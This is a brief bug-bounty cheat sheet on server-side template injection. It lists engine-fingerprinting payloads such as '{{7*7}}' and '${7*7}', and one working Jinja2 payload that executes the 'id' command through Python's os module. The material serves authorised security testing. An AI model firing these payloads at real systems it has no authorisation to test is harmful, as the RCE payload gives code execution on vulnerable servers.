hunt-ssti

14. SSTI — SERVER-SIDE TEMPLATE INJECTION

Easy to detect, high payout ($2K–$8K). Direct path to RCE.

Detection Payloads (try all)

{{7*7}}          → 49 = Jinja2 / Twig
${7*7}           → 49 = Freemarker / Velocity / Mako (all use ${...})
<%= 7*7 %>       → 49 = ERB (Ruby)
*{7*7}           → 49 = Spring Thymeleaf
{{7*'7'}}        → 7777777 = Jinja2 (Python string repetition); 49 = Twig (numeric coercion of '7'). Differentiates Jinja2 from Twig.

RCE Payloads

Jinja2 (Python/Flask):

{{config.__class__.__init__.__globals__['os'].popen('id').read()}}